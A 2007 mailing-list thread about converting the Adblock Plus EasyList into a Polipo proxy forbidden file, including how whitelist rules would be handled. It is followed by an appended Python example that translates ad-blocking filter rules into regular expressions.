2007-10-10 Thread Pat Double
On Tuesday 09 October 2007, Juliusz Chroboczek wrote:
  It's fairly easy to convert the adblock plus 'easylist' into a polipo
  forbidden file.

 Do you have a script you'd be willing to share?  I'd be glad to link
 to it from the Polipo page.

If phobos doesn't have a script I'll most likely write one. The problem would 
be that the 'easylist' also includes a whitelist at the end, I assume that 
all patterns are scanned from start to end and if something is blacklisted 
AND whitelisted, it is allowed. AFAIK Polipo only provides a blacklist.

-- 
Pat Double, [EMAIL PROTECTED]
Ye must be born again. - John 3:7




Re: Incognito Live CD using Polipo

2007-10-10 Thread Juliusz Chroboczek
 If phobos doesn't have a script I'll most likely write one. The
 problem would be that the 'easylist' also includes a whitelist at
 the end, I assume that all patterns are scanned from start to end
 and if something is blacklisted AND whitelisted, it is
 allowed. AFAIK Polipo only provides a blacklist.

If you provide me with the precise semantics of the whitelist, I can
implement something compatible in Polipo.

Juliusz



Re: Incognito Live CD using Polipo

2007-10-10 Thread Pat Double
On Wednesday 10 October 2007, Juliusz Chroboczek wrote:
  If phobos doesn't have a script I'll most likely write one. The
  problem would be that the 'easylist' also includes a whitelist at
  the end, I assume that all patterns are scanned from start to end
  and if something is blacklisted AND whitelisted, it is
  allowed. AFAIK Polipo only provides a blacklist.

 If you provide me with the precise semantics of the whitelist, I can
 implement something compatible in Polipo.

Is this what you're looking for?

http://adblockplus.org/en/filters


-- 
Pat Double, [EMAIL PROTECTED]
Ye must be born again. - John 3:7




Re: Incognito Live CD using Polipo

2007-10-10 Thread phobos
On Wed, Oct 10, 2007 at 07:32:31AM -0500, [EMAIL PROTECTED] wrote 1.1K bytes in 
39 lines about:
:  Do you have a script you'd be willing to share?  I'd be glad to link
:  to it from the Polipo page.
: 
: If phobos doesn't have a script I'll most likely write one. The problem would 
: be that the 'easylist' also includes a whitelist at the end, I assume that 
: all patterns are scanned from start to end and if something is blacklisted 
: AND whitelisted, it is allowed. AFAIK Polipo only provides a blacklist.

I haven't scripted the conversion from adblock plus to forbidden file
yet.  I do strip out the whitelists.  I'm doing this in vi:

abp: *hitbox*
polipo forbidden: .*\.hitbox

And that's as fancy as I get for now.  I lack the time to write a decent
script and handle all of the regex issues.

-- 
Andrew
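
The conversion discussed in this thread, sketched as an added example (it is not the Incognito script linked earlier, nor code from anyone on the list). It goes beyond the single `*hitbox*` case to anchors, wildcards and regex rules, and reports the whitelist and other rules it cannot express instead of dropping them silently. It assumes Polipo's forbidden file takes one POSIX extended regular expression per line and searches for it anywhere in the URL; the sample list is constructed and the function names are the example's own.

```python
import re
import sys

# Constructed sample in Adblock Plus filter syntax (not the real EasyList).
SAMPLE_EASYLIST = r"""
[Adblock Plus 0.7.1]
! constructed sample list
*hitbox*
|http://ads.example.com/
/banner/*/img
.swf|
/ad[0-9]+\.gif/
/track\d+\.example\.net/
example.org#div(sponsor)
tracker.example.com/pixel.gif$image
@@|http://ads.example.com/allowed/
"""

ERE_SPECIAL = set(".^$*+?()[]{}|\\")
# JavaScript-only regex syntax that POSIX extended regexes do not have.
NON_POSIX = re.compile(r"\\[A-Za-z0-9]|\(\?")


def abp_to_ere(rule):
    """Translate one plain ABP blocking rule into a POSIX extended regex."""
    start = rule.startswith("|")                  # |foo  -> anchored at start
    end = len(rule) > 1 and rule.endswith("|")    # foo|  -> anchored at end
    body = rule[1 if start else 0:len(rule) - 1 if end else len(rule)]
    # Escape every literal chunk; ABP's "*" wildcard becomes ".*".
    chunks = ["".join("\\" + c if c in ERE_SPECIAL else c for c in part)
              for part in body.split("*")]
    return ("^" if start else "") + ".*".join(chunks) + ("$" if end else "")


def convert(text):
    """Return (patterns, skipped); skipped holds (reason, rule) pairs."""
    patterns, skipped = [], []
    for raw in text.splitlines():
        rule = raw.strip()
        if not rule or rule[0] in "![":           # blank, comment, list header
            continue
        if rule.startswith("@@"):                 # whitelist: no blacklist equivalent
            skipped.append(("exception", rule))
        elif len(rule) > 2 and rule[0] == "/" == rule[-1]:
            body = rule[1:-1]                     # ABP regex rule
            if NON_POSIX.search(body):
                skipped.append(("regex", rule))
            else:
                patterns.append(body)
        elif "#" in rule:                         # element hiding acts on HTML
            skipped.append(("element-hiding", rule))
        elif "$" in rule:                         # per-type options need page context
            skipped.append(("options", rule))
        else:
            patterns.append(abp_to_ere(rule))
    return patterns, skipped


if __name__ == "__main__":
    patterns, skipped = convert(SAMPLE_EASYLIST)
    print("\n".join(patterns))                    # one forbidden-file entry per line
    for reason, rule in skipped:
        print(f"skipped ({reason}): {rule}", file=sys.stderr)
```

Every skipped exception rule is a URL the original list would have allowed, so the stderr report is the place to look when the blacklist-only result blocks too much.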

